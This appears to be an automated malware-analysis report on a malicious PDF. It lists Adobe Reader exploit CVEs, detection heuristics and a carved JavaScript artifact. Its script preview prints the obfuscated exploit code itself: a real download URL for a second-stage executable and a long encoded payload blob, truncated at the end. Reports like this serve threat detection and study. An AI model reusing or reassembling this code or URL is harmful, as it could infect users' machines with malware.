MALICIOUS
468
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
The PDF file contains embedded JavaScript that utilizes an eval() call to execute code. This script is designed to download a second-stage payload, specifically an executable file from the URL http://67.209.224.57/f.exe. The eval() function is used to dynamically execute the downloaded content, which is highly suspicious behavior.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 10
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
if ('CNPOlX'=='NZSLin') nrTgS='PqlKog';function LfyweL(){}var VDol='QOxu'; t('app.eval(app.sttr)'); function wiTNm(){}if ('XhAHM'=='MVfbAE') vQjN(); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://67.209.224.57/f.exe Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0005_000.js |
pdf-javascript-stream | PDF /JS object 5 at offset 0x19E | 14898 bytes |
SHA-256: fd0faf9b0ff2e14532837b0ea74392275013e6b567bcce54baaae96999e884e3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 31 of 56 identifiers look randomly generated (e.g. 'sEtyjKjaYfXovTf') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var SMXrL='hamuVC';function PoAWcP(){var Hsghk='Fhkgk';if ('KkqwX'=='FxvBH') wFPNA();}
app.fu="http://67.209.224.57/f.exe?";
var cuae=188;
var MGcdm='atzoMe';var TNpsYq=17;var kcVRNP;
b = "itcnuf=_\nPgso(noWE,K{)sEtyjKjaYfXovTf=Ric(noitcnu,WxNtNoRkxqlM rav{)t=LzPRLN wen;)(gnirtSrav(rofXbz z;0=BKcZGBKcZGXbNoc<gnel.WxNtGXbz;htBKcZY rav{)++CKLOJKnoc=Hahc.WxNtNXbz(tArKcZGoCrahc.)B)0(tAedrav;ShBrYBYR .tRkxq=rahccZGXbz(tARkxq%BKel.tahc.)htgntAedoCr;)0(+LzPRLNlMgnirtS=orf.edoCrahCmOJKnY((HCKLShBrYBYR^.tRkxq^gneler\n};))htlM nrutPRLNPgso\n};Lzcsenu=K(epaQO;)KPgsogra=slKnemueellac.stirtSot.)(gn(ecalper.tyjKjWE',sET(lave;)'iaYfXovso(RslKQO,KPg%'(};))9%08E%EE%4F%33F%5A%A%8E%%9F%6C%6FB%1A%BBDD%03B%FB%7A%%8A%AB%B%5BB%2B%CB%A5B%DB%F%3B%%7C%AB%7AA%CA%DB1B%EFB%CD%2C%%BA%DB%A%5AD%CA%3B%5BB%1A%8%3B%%2B%EA%6BA%BB%1CCB%DEB%5A%BB%%EA%AA%A%CCB%5B%8B%A3C%4A%D%CA%%DB%9C%ABA%0A%3BEB%B6A%8A%9D%%AA%0C%A%7BB%FB%1B%E6A%8A%C%AD%%AC%9B%3BB%6B%AABB%DCA%AC%BB%%CA%BA%A%8AA%1A%8A%82A%DA%E%CA%%CB%1A%9CA%DB%6ABB%16A%BD%AA%%AD%2A%A%5CB%9B%6C%CFB%4B%D%1A%%6A%EA%DBB%9B%8B0B%DBD%DB%7A%%7A%0C%C%9CC%1C%BB%CDB%1A%4%EA%%9B%8B%6AB%EA%7A8B%4DB%6B%4A%%FC%5C%C%7AA%1A%0A%EDB%AB%8%9A%%0B%7A%FAA%6A%6ABB%F0B%AB%CB%%AC%AB%B%CCB%2B%1B%92B%8C%A%AB%%EA%CA%9CA%1B%9A2B%CFB%AB%8A%%5A%DB%B%5BB%EA%CA%B6A%DB%B%5B%%EA%BB%7AB%CA%CA8A%03A%9B%FB%%3D%0C%A%DBC%FB%CB%6FB%5C%F%3B%%5B%8A%ABB%AB%3B0B%B0A%2B%AB%%AC%7A%A%9DA%3B%BB%09B%CD%6%3A%%DB%7A%2CA%AA%FAAB%6AB%0A%DB%%7A%9A%A%CBB%5C%0A%93B%AA%4%9A%%6A%ED%1BD%0A%2A8A%B3B%3C%7A%%CB%1B%D%EBB%0A%DA%DFA%AB%2%3B%%DB%FB%EAB%3B%EAFB%6DC%8C%3B%%3B%AA%B%8AA%DB%7B%1EA%BB%7%1A%%AA%6B%EAB%EC%BA1B%BCA%6A%DB%%AA%2A%C%1CD%DD%BB%FCC%BA%3%9B%%AA%DB%1AB%BB%6ADB%BBB%DB%AA%%DB%6A%D%8BB%DB%6C%18A%5B%7%DD%%DC%3B%AAA%8B%AB6B%49B%0B%DB%%BB%7A%A%8AA%6B%AB%15C%8D%8%DA%%5A%DA%0BB%AA%5D5B%BAB%EA%2B%%6A%EA%B%1BB%6A%8A%4CC%DA%A%3C%%CA%CB%BBA%4C%1B5A%AEA%2B%DC%%5B%8A%B%BBA%CB%8A%95A%2B%E%3A%%EB%AB%1BC%7A%9A9D%F9A%4B%AA%%0C%CA%A%9AA%FA%0B%EBB%EA%8%CB%%7A%9B%1BA%ED%EADB%AFB%5A%0B%%DB%8C%A%3BB%DB%BB%8BD%EA%B%8C%%CB%8B%9BB%AC%AA3A%4AB%AA%1D%%AA%9B%B%8AB%6A%AA%00A%DB%A%6B%%8B%EA%DAD%FA%6A3C%C4B%0A%AA%%1C%6A%B%1BA%3C%EC%A9A%5A%3%AB%%FA%3B%AAA%5B%DBCA%FEA%AA%0B%%6A%4C%B%2BD%ED%6A%F0D%8B%2%7B%%CC%CA%DBA%0B%BB7A%3DB%2A%1B%%4C%BD%B%7AD%6A%BB%38A%8A%D%AD%%FB%BA%4AB%BA%6AFB%F4A%8A%6A%%CB%5A%A%0BB%2C%ED%EAB%7B%3%FB%%7A%FD%ECB%3B%FB4A%DDB%1A%FB%%DB%EA%C%0AB%FB%AA%F8D%8A%4%5C%%DA%0B%DAD%EC%FBBB%B1B%DA%4B%%8A%7B%B%AAA%BB%DB%4BA%6A%8%FB%%7B%1B%DAB%5A%8A2B%94B%8A%EA%%4B%AA%B%DBA%8B%3B%B0B%8A%C%3B%%0A%EA%8AA%BB%2BEA%F4B%4A%3B%%BB%DB%B%3BA%2B%CA%8DA%1A%E%4A%%0B%8A%2AB%2B%CADB%BCA%EA%4B%%9A%8A%B%BBB%3B%0B%2EA%8A%7%FA%%8A%CA%7BA%8A%BBDB%9EB%9A%6A%%9A%5A%B%9CA%9A%CB%B2B%CB%4%DB%%8A%EB%9AA%4B%7BFB%CCA%6A%0A%%0A%FA%B%2BD%DB%BB%BBB%5A%F%9C%%7B%0B%CAA%EA%0BCA%B5A%EC%EA%%AB%CA%B%FAA%6A%7B%B5A%9B%8%9A%%5B%CB%BBB%DB%DBAB%2EA%7B%7A%%6B%EA%B%6BB%8A%CA%0FB%5B%F%8A%%CB%EB%2BB%FB%7B2B%D9B%7A%1B%%DB%5C%A%2AA%3B%1B%EBB%FB%9%AA%%6B%0A%5AA%CA%CABB%AEA%7B%3B%%0B%DB%A%BBA%BB%EB%DAA%EB%6%3A%%9B%AA%9BA%DB%AB5C%2EB%6B%CA%%3B%DB%A%EAA%FA%9B%B1B%8A%8%AA%%1B%8A%3BA%1B%BB9A%88B%3B%0A%%AA%6B%B%3BB%6B%BB%9FA%CA%8%8A%%8D%8A%8AA%BA%1A2A%71A%AB%EA%%DA%AB%A%DBA%AA%DB%12A%4A%D%AD%%AB%CA%2CC%DB%2BDB%27A%5B%1A%%EC%6A%B%EBB%6A%3B%D5B%DD%D%7A%%BB%FC%ACA%4B%4BBC%1AB%6A%AD%%7A%0B%B%8DB%CA%8B%36C%DB%E%0B%%9A%8B%7AB%DD%1ADB%97A%BD%BD%%5D%3B%A%6AB%CB%BB%FAB%9B%2%FB%%9B%9B%DBC%AB%0B5B%9CD%4B%AB%%9A%EA%A%0BB%8A%2B%CDB%FB%A%5A%%CA%FB%6BB%7C%9DEA%D3B%7A%6B%%CA%BA%C%5AB%FB%8A%26B%3A%8%5A%%9B%FA%DBC%5B%FBFB%28A%AB%4B%%BB%2B%B%ABC%AB%3B%37A%FA%9%EB%%3B%0A%BDD%6A%1BEB%D7D%FB%3A%%FA%DB%A%BAA%DB%AB%69A%AB%0%7A%%0A%CD%7BA%6C%1CAB%ADA%1B%ED%%2A%5A%A%8AB%EA%8A%A3C%3B%0%DC%%DA%8A%EBB%AB%0AFA%EFB%CD%AB%%FA%DB%B%3BB%3B%FB%EAA%FB%E%2C%%1C%1B%ADB%7A%DCBA%BBB%EA%1A%%3A%AA%B%FCA%EB%2B%B4A%8A%6%AA%%BB%DB%4BA%6A%DAEC%BCC%1A%DC%%6A%AD%B%8BB%2A%DB%A7A%BB%8%6C%%6B%4A%8BB%FB%DB8A%43B%8A%EA%%DC%FC%A%8BB%DB%2C%17A%8B%3%FC%%EC%1A%ADA%8A%0C5B%BBA%9B%DA%%EA%5A%B%DAA%0C%CB%BFA%AB%E%6A%%8A%4B%1BA%3B%EA1B%D7C%BB%BB%%1B%BA%A%FBB%DC%5A%1DA%EA%5%5B%%BD%FC%BBB%8D%CB5A%1AB%5B%7D%%0A%EB%B%7AB%AA%BA%ECA%8A%D%6B%%4B%EA%ADD%8A%CA9C%B0B%4C%CB%%DA%7A%A%ADA%3B%4B%A8B%DC%5%DB%%BB%8A%6CA%1B%5B6A%E1C%9B%CB%%AA%AB%B%9BA%5A%3A%79B%AB%8%AA%%BA%3B%8AB%CC%6A0A%BEA%9A%AB%%9A%6B%D%FAD%AA%6C%86A%4B%B%7C%%BB%AB%3BA%3A%4BBA%56B%2A%AB%%4B%FA%A%3CA%3B%9A%F5B%8A%A%6A%%6A%FB%2BB%DA%0A7D%8BD%DB%1B%%BB%9C%A%0BA%1B%7A%57A%DB%E%7C%%BB%BB%7AA%EA%6A8A%ABA%6A%EA%%5A%CC%C%BAA%6A%DC%A5A%4A%9%9B%%8A%EA%2BB%3B%4BFB%EEA%DB%FB%%FB%7A%B%3BA%FB%4A%DEA%DB%1%DB%%AA%EB%6AA%4B%FBEA%89B%DA%3B%%FB%8A%A%DBA%4B%BB%E7B%1B%D%8A%%DB%4B%AAA%8A%BBBA%61B%4A%7B%%DA%FB%B%5AA%EA%0C%0AA%5B%8%4B%%3B%BB%DBA%CA%8B6B%D9A%DA%3B%%7C%0A%A%3BA%BB%BA%FBC%2C%4%BB%%CA%EC%5CA%8D%4C8A%1DA%2A%2D%%CA%5C%C%3CA%4B%DB%9BD%CA%F%CD%%0B%AB%BBD%0B%3BEA%ACA%0C%BD%%BB%8A%A%8AD%6A%BB%C5A%9C%A%AD%%8C%BB%9CB%4A%AA7B%CDB%AA%DB%%4B%8A%A%3CA%CD%DB%C8D%CA%6%0A%%BB%EC%6BA%9D%BB9B%52B%CA%BB%%0B%5C%D%CAB%AA%CA%CFA%5A%D%6B%%7B%8B%FAC%BA%6A5A%8CB%EB%BA%%9C%4B%B%DBB%7A%4B%2EA%AD%5%0B%%EA%0B%5CB%FB%9DBB%5EB%3B%8A%%7B%CB%B%BBA%5C%3B%D5B%BB%7%DB%%1B%4A%2AB%BD%1BBB%F2A%5A%BA%%CA%3B%A%BAB%0B%BB%8DB%EA%7%0B%%8B%CA%BBB%1A%BBAA%CAA%DB%5A%%1B%CB%A%DBB%CA%5C%6DB%EB%4%3B%%9B%BA%EAA%8A%FA2B%E29%8B%8A%%AF%2F%E%AEF%1F%AE%EFA%0E%9%BF%%0F%8D%BEE%BE%AECF%6AE%5A%FF%%1E%6F%E%ECE%1F%5F%04A%3E%1%EB%%7E%C9%3EB%DB%9E3F%CAD%5E%0F%%9F%6F%E%1FE%AA%8E%ADE%BF%1%FE%%0A%0F%DFA%8B%3BCA%C2E%FF%2A%%0D%BF%F%5FE%0F%4E%62A%8A%4%FB%%1C%6A%EBA%7B%CE2A%8DF%88%2B%%6F%9F%F%EBF%0F%6F%C4E%DE%D%3F%%9F%BE%0DE%CE%0FFB%EBB%DA%2B%%8B%EA%E%59A%DE%FE%DDF%6B%D%8F%%BE%9A%3FB%FA%5ADA%45B%0A%9E%%CE%9A%F%BEF%1F%DC%D0F%2E%0%EE%%8E%CE%2BF%EE%1EEE%26F%8B%EA%%7A%2A%A%FB8%8F%AB%94E%BF%0%1F%%8E%FF%FBF%FD%AFBE%71E%7F%CE%%3B%6E%A%3AE%2F%BA%2BC%0F%E%BE%%4E%AE%8EE%BA%AE1F%9BD%DF%3E%%7E%AE%C%7EF%0B%7F%EAB%4B%D%3F%%9F%9C%7FF%9E%CE5E%8EA%AA%1A%%BA%7B%E%6FE%3F%FD%4FF%FF%E%DD%%AE%DF%7FB%7A%EB58%44B%EF%AE%%DF%8A%E%AEF%AE%DC%E0E%DE%F%EF%%CA%FA%8EF%6E%3E3F%60B%CE%BF%%9A%3A%A%FBE%7E%BF%E0F%8D%1%AE%%CF%6E%BEA%CB%FFCB%3FB%FB%4B%%0F%3F%D%AEF%7F%3E%1AE%9F%B%AE%%D8%FA%CAF%1E%EE2A%B1E%0F%FF%%AE%AD%F%4EE%CE%CE%D0A%AA%C%BA%%DE%AE%8BF%8D%7ECE%E3E%FE%AE%%DF%3A%E%BEF%1C%BF%98F%0E%1%5D%%9E%0B%3FA%3B%2A6B%2AD%1F%0F%%BE%CE%E%7FB%EB%7E%C2A%9A%2%7B%%AC%6E%6FF%DF%FFBF%98F%EF%0C%%7B%5E%A%4AE%0F%18%5AA%9A%7%CE%%8D%AE%7FE%9E%EE6E%AAA%6E%CF%%9E%0B%E%7EF%DF%9F%50B%DB%4%EB%%2F%6A%0AC%DF%DF7E%AFE%EE%3F%%6E%EF%B%8BB%3B%7A%04F%0A%D%7F%%CE%CC%FEE%BF%6E7E%A4A%1B%7E%%2F%18%F%EEF%1F%DC%05E%0E%3%9E%%4A%AA%0EB%8A%2A0F%D4A%2A%4A%%CE%3A%F%CFF%9E%1C%82E%9F%1%AF%%9A%4A%5EF%3F%DFBC%D8E%BE%BE%%7E%5E%A%BFE%49%6B%B6E%0E%3%5F%%AE%BE%1EE%CE%0D9E%6BA%5E%7E%%9B%3B%F%6BD%FF%7E%ABE%0F%8%CE%%1F%CF%CEF%E8%4B49%0AF%3F%AE%%DF%AF%A%AEE%DE%BE%D7F%AE%1%EF%%AE%DC%8EF%4F%6F0E%A9F%58%3A%%8E%78%E%9FD%EC%EA%46D%EC%B%1F%%2A%3E%AEF%8B%6B0E%07F%3E%1D%%7E%0E%F%DEF%3E%8A%D6F%BF%6%1E%%BF%AF%AEE%1F%BA8F%E1A%1F%7C%%3E%2A%F%EEF%2F%3B%42A%3B%2%FA%%9A%6B%6FA%CB%5BDE%21F%BF%7F%%7F%3E%F%3FA%BB%3A%AFA%9B%7%DA%%2B%5B%4AE%9E%982F%A7F%9E%FB%%1E%8F%A%9FE%8B%FB%98D%0E%B%EE%%6E%AE%9EB%6E%CFBE%08F%7E%BE%%8E%DF%E%CEE%FF%5A%5FD%3F%3%7E%%8E%4B%1BA%DF%AECF%EFA%1A%6F%%7F%3A%B%2AA%DB%2B%ACE%CE%1%AE%%2E%6E%BEB%6E%2F9A%75A%6B%3A%%6B%AB%B%3BE%BF%08%89B%8F%4%BC%%3F%7F%7EE%1D%3F7D%00A%4B%6F%%3F%4B%C%7FE%7F%3E%F6E%9F%3%CE%%0F%DE%3BE%1F%0EBE%82B%BF%3F%%4F%DF%D%3EA%FB%DF%7FF%EE%5%3F%%5F%2F%6BA%0A%2ACE%DDB%7A%9B%%1B%DA%F%8FE%CF%7E%04E%9F%0%AE%%BB%FA%CAA%6A%8A6A%C78%FB%6A%%6F%8F%E%6EE%3F%CE%AEB%0F%2%CC%%BC%0E%ECF%AF%2E7F%3DD%0B%EE%%8F%DE%E%CDA%4D%3F%C5F%9A%C%0E%%CE%6F%4DF%EF%FEAA%DFE%38%3F%%FF%8E%F%4FE%9C%DA%BFD%DF%8%BF%%3A%8C%5FE%6E%2FEE%6EA%6F%6F%%8A%FA%F%0FE%BF%CC%3BE%0E%1%7E%%3D%2F%7BC%9E%AF8F%34B%FC%2E%%2D%6B%F%1EF%7F%ED%E2B%0D%9%EF%%3E%0C%59E%CC%8EFF%62C%CB%5D%%FE%1E%F%EDA%CC%9F%7CF%AF%E%AF%%CE%CE%0FE%CE%CE6B%C7F%0B%9B%%3C%6E%E%BFF%6E%DE%5BB%0B%B%3B%%8E%A8%6BF%EF%6E7F%80C%FB%DE%%8E%3E%E%BCA%3C%6F%1EF%F8%3%88%%5E%AE%5EF%2F%5E7F%C6C%AB%1F%%1E%2D%F%DEE%9E%3E%2DA%BF%A%AA%%5F%58%9FB%6E%9F9F%D2E%7D%FF%%3D%2E%F%4EF%4B%9C%59E%DF%5%5A%%8F%9F%3CB%7E%2E4A%28F%C9%5A%%4E%EE%C%EAE%AF%6C%7FE%9D%B%4B%%DF%5E%7FE%5F%7FFF%FFD%5A%FF%%5D%4C%F%2DA%5E%EF%149%6B%D%EE%%FA%CF%7FD%CE%9CCE%CFF%5E%3F%%8C%AF%D%0BE%DF%7D%68E%9D%E%6B%%3E%1E%3EF%CE%9F4A%EE9%6A%DB%%9F%1F%A%2FC%5E%BD%9AD%FE%9%1F%%DE%BE%0BF%AF%DE1E%B6B%DF%6E%%7A%7A%B%EFB%AB%EA%38F%1A%1%7A%%9B%1B%3BB%7B%0A79%F9C%9E%DC%%CD%BE%B%7FE%7D%0D%62E%5C%A%CE%%0F%8F%9EF%AD%EBAD%1CF%7D%2F%%FA%3B%E%DBA%3B%DB%40B%BB%F%FA%%DC%6B%0AF%0D%1F2F%BDE%9E%5F%%BA%FD%F%0BA%0A%AB%15A%1B%A%F8%%CE%AE%4FF%DE%9ABE%9EF%5C%5D%%8A%EE%A%0BE%AA%1F%F9F%0B%E%3B%%6E%DB%9EF%FA%EA4B%39A%AB%FA%%FB%2B%A%1BB%AF%3B%ABB%FA%7%6B%%3A%5A%6BE%CF%598F%CBE%3F%5A%%2A%BE%D%BDE%7C%DD%E5C%8D%9%5A%%0C%6A%4AD%0C%1C6E%EAA%6C%9C%%0F%3F%C%DFE%DF%2D%2ED%0B%A%5C%%6E%ED%6CA%0D%9C4A%558%5F%FB%%BF%2E%E%7DE%4C%FE%C3D%8E%6%FD%%7D%8C%2CC%6E%ED4C%91C%EB%2D%%ED%AF%D%FED%3B%BE%86F%7C%E%CF%%5A%2E%9C8%5F%98EE%3EB%FF%BF%%FC%8F%E%7EB%0E%7F%73E%1F%2%BF%%FE%5F%BEB%8F%FF5A%C9B%5F%DB%%BB%1E%A%BFE%4B%AF%10E%EA%E%AA%%A8%3A%0AF%0F%1E9E%7CE%3A%7E%%9F%5D%F%2FE%0B%5F%47E%DE%F%5E%%1A%CE%AEA%3B%0A5B%10F%BA%BB%%FC%EF%F%4EB%1E%8E%A6E%FB%5%DD%%BF%CE%9FF%9B%1E59%45F%5E%BF%%DA%AF%E%CFE%3F%CE%48D%CF%C%DE%%7E%BF%EEE%CD%5A1E%0BE%1E%CE%%BF%7A%F%CEE%0E%2F%4BD%FF%1%4E%%1E%9E%DFE%7E%6C9E%0CE%3E%DB%%8F%CF%B%7EA%1A%8B%A6F%0E%6%4E%%BC%DE%5AE%9F%5EAF%9EB%1B%2F%%FF%98%F%98E%8E%EF%91F%1E%5%0F%%BD%3A%4FE%3E%CF3C%90B%7C%AE%%8F%CA%F%88C%9E%AC%F8D%DE%4%CE%%8F%7A%BDE%5E%0F1E%5DF%BE%8E%%7A%6B%F%7AA%2C%AB%E8A%BD%E%BE%%FB%FC%6AF%BA%7DFB%A5D%8A%2C%%CF%5A%C%2BB%5C%8A%A4B%7A%4%09%%0F%FF%BFD%BC%FADE%12E%9C%CF%%DE%3A%E%8FE%CE%CF%BBF%DF%5%BA%%BE%0E%CEB%5F%2E5A%7CD%6D%E8%%BF%DF%E%AFE%3A%AF%5FF%FD%8%FD%%CE%8D%DEC%BA%BDBC%19C%BE%2F%%FB%0E%D%78C%BE%BF%ADC%AC%E%EC%%BE%BE%5AE%8F%7EFF%9CA%4E%3F%%BB%FA%B%6FD%2B%8C%88E%1A%F%4A%%1C%8A%6CB%BA%BA29%00D%FC%FE%%4D%3F%B%3A8%DA%0B%0FD%2D%9%8D%%2F%DC%2FA%3E%8E2E%10E%6C%2D%%4B%DC%D%6CF%AF%1F%65F%8E%4%6B%%3E%AE%3FE%4F%7E2B%10F%4F%29%%9E%7F%A%7EF%1F%AD%3FD%7C%F%2C%%AE%8A%1DF%6F%0FDF%8DC%1B%2F%%2C%EC%C%AFF%4E%8E%9BF%2A%1%59%%1E%1E%ECC%AC%8CBD%8BD%EB%9A%%5E%3F%C%1CA%7C%5D%77F%98%1%78%%8C%0D%7CE%DC%BEDF%8BC%FB%EE%%BF%BF%C%3DB%FD%9D%F8F%9E%6%CF%%0F%2E%3FF%5F%0E6B%F6C%EA%5B%%2C%ED%D%EEF%9F%0E%E4B%7A%8%C9%%5D%CD%6CA%EF%1C4C%9CC%1E%1F%%9C%AC%A%ECE%FE%CF%06F%DE%F%DF%%3F%6F%AEA%4B%7AAD%19C%5F%0E%%2C%DD%A%CDE%6E%2F%3CE%EE%6%2F%%AC%3D%0AD%DE%5CAE%0DA%1E%FF%%49%6B%F%FEF%3E%7E%EFC%CB%8%BC%%4E%BC%ADE%4F%5A1E%16F%9F%3E%%5C%8A%D%DDF%2D%0F%9BE%9F%5%EB%%AA%2F%BBB%1B%3BDB%428%8F%7B%%1D%1C%C%4CC%9A%BF%6AD%BC%F%BC%%0D%0A%4EC%4C%7DEF%B8D%CD%2B%%FF%1D%E%1CB%4F%3F%F2E%38%9%58%%FE%6F%9DC%CF%7EDB%09E%8E%1F%%8D%BA%F%3FB%1E%3E%B6B%6A%7%A8%%BF%6E%6EA%AE%0BEA%57B%BE%EB%%DB%FA%B%CAA%6E%6B%0FA%DA%2%EE%%3E%BC%29E%9E%CF1D%30D%3E%8D%%BC%8B%D%CCA%9F%2C%1AC%2D%1%5F%%2E%0F%BF9%8B%5F6F%54F%0F%C8%%FB%AE%E%EDF%2E%7E%A8D%DC%6%FB%%CB%AA%EBB%BB%ABAB%64A%DA%1A%%EB%DA%A%1AB%7A%4B%3BB%FA%9%0B%%6A%0A%3AB%AB%DB2B%32A%6A%BB%%6A%5B%B%EAB%EA%7B%67B%7B%6%BB%%8B%CA%0AB%AB%1B0A%36B%EA%CB%%2A%7B%A%5BB%7B%AB%6CA%0A%B%7B%%6A%5B%CBB%EA%0A7B%65B%CB%7B%%BB%6A%B%0BB%2A%0A%16A%6A%5%CB%%FB%CA%5AB%7B%0A5B%CEA%0A%6A%%7B%6B%A%5AB%0A%FB%CAB%1B%8%3B%%7B%CB%0AA%5B%CBBB%60A%1B%0B%%EA%8B%A%0AB%AB%DB%66A%2B%3%BB%%5B%CB%9BB%BB%6A1B%0CB%6A%AB%%CA%5A%A%FBB%1B%8B%00A%3B%A%CB%%0A%1B%6AB%6A%1A8B%A7A%BB%EA%%1A%3B%B%ABB%7B%7A%11B%4A%5%BB%%8B%3B%7AA%5B%7A3B%61B%9B%1A%%0A%AB%B%7AB%8B%5B%71B%1B%8%0A%%6A%0A%BBB%AB%DB6A%38B%4A%1B%%7B%5B%B%1BA%DA%EB%E1B%7A%0%2A%%2A%8B%5BB%2B%BBDB%53B%7A%BB%%7A%8B%A%2BA%7B%AB%1BB%DB%0%AB%%3B%7A%BBA%EB%EB0A%DBB%2A%7A%%5B%2B%B%DBB%AB%1A%2DB%0A%7%BB%%BB%7B%ABA%CA%0ACA%52A%0A%FB%%6A%5B%A%8BA%1B%AB%E6A%0A%3%DB%%2B%3B%ABA%6A%BB5B%26B%EA%6A%%EA%7B%B%6BA%BB%7B%78B%CA%0%1B%%0A%3B%ABB%EA%CB7B%66A%5B%2A%%7B%AB%A%BBB%7B%CA%0BE%78%F%CE%%1A%2E%FFE%6F%FF0F%41A%EE%7F%%FB%AB%A%9BA%4B%EA%B5A%2F%D%4B%%0E%DE%BCD%BE%1FFC%1E9%6A%6A%%29%AF%F%6EE%8E%CE%C0E%DE%C%AE%%6F%EC%DAE%FD%9C7D%F1F%CD%2F%%BA%DA%8%0FF%2E%8E%00E%4A%3%6E%%6E%0F%CCE%AF%FC6D%7DF%9E%9A%%9A%7F%F%3CE%5E%AE%91B%1A%7%2A%%6E%BE%49E%2E%EBBF%F6E%6E%7B%%1A%CF%F%ECF%FE%5E%3EA%9E%E%8F%%2C%AE%8EE%EE%AFBA%79F%59%3E%%2F%CE%C%0AF%1E%0C%11F%5D%0%8B%%BF%5E%7FE%FF%AFDF%1FC%1A%AE%%AF%EE%E%EED%5F%AD%F3B%EE%9%8B%%4E%BF%08D%FB%1FEE%2CC%1E%EC%%2B%7F%E%DEE%1F%6E%BBF%EF%0%3E%%DB%7B%EAB%3A%AE3B%3FF%0A%DB%%2B%0A%A%6BB%AA%7A%8AD%58%9%6F%%1C%6F%5CD%5A%2FED%2CE%CC%AE%%EF%7F%E%1EE%CD%6B%81E%AD%C%6D%%DA%6B%BEB%EE%EAFB%AFB%EB%6A%%EA%FB%D%0BF%0F%9C%C7F%6C%1%AA%%1E%BE%AFF%9F%DF8A%68A%8A%DB%%CB%CE%A%CB9%3A%7B%4EE%8F%C%DF%%8D%9D%4AE%CC%BDFC%26B%0B%CD%%CF%EA%F%DAB%BF%7B%7DB%7E%F%DF%%6F%6A%5BA%DA%BB7B%40A%0B%8A%%BB%DA%B%0EB%4B%FB%03B%EA%D%3B%%FE%EF%38E%0B%4E4E%83E%BA%0F%%3B%3A%E%ABC%AC%1B%DDC%0D%5%9E%%6A%2C%9CB%CA%DF9A%36E%88%2F%%BC%0E%E%6EF%DF%5D%6BD%9C%D%FF%%2D%2A%EDE%3D%7FAC%24D%6A%AF%%AF%0C%C%CE8%4A%FE%618%3E%7%FE%%2A%BF%0EF%7C%9EFE%FCF%DB%3E%%DF%7E%F%0FE%5F%FF%BCB%3A%7%CA%%FA%9B%CA8%2B%6A1F%C3F%1F%DF%%2B%CE%D%CFE%1E%AE%89E%3A%9%6E%%4F%CE%1FA%6B%7FAF%95B%8A%BB%%BA%3B%E%8FE%6F%3D%E3B%6F%4%2A%%AF%BD%BEB%6E%FE4E%10C%EF%88%%1E%5F%B%1EB%6D%1A%2FB%FB%A%6F%%FE%AE%0C9%BB%DF3E%C6B%BE%9F%%AE%AF%A%1EF%CE%9C%5CE%6F%2%CF%%AE%9E%8BE%7C%2E0E%C5E%0B%DE%%9F%8D%E%0E9%FB%1B%858%3F%C%7E%%1C%8E%78E%AE%5C9A%EDF%4F%EE%%8E%0B%F%AFE%6C%8E%B5A%EF%A%98%%AE%8E%EFF%AC%AB8D%84E%1F%0E%%5A%6F%E%FFF%DE%FF%50E%FD%D%BF%%7F%5F%5BF%EA%8EBE%F1E%FE%EE%%2D%DF%E%8EE%1E%0F%CEA%6F%6%2E%%1F%DC%7FE%2E%0F9F%4AA%8A%BA%%6F%EE%F%2EB%6F%8C%A4B%4B%6%DB%%6E%29%CBA%0F%6EEE%39A%CE%5E%%4A%1F%B%EAF%AA%9E%91C%CD%5%0F%%3F%7A%4FF%3E%AEDF%B2E%4A%BE%%4B%BA%E%4AE%0F%18%54F%1A%7%BD%%BF%6E%5DD%9E%BD7A%45F%2E%6F%%8B%BF%A%FBF%AD%BD%C4E%2F%F%FF%%FA%1A%DFE%29%EE8E%96F%DA%8E%%1E%CE%E%BEE%EB%1E%FAC%8C%9%6F%%BE%2C%CFF%6B%2D6E%36F%0F%0F%%8E%4E%9%DBE%59%5E%F3E%98%7%BE%%1B%2A%5AF%9F%4F4E%A2B%6E%1E%%1A%EB%E%DBB%FA%8E%1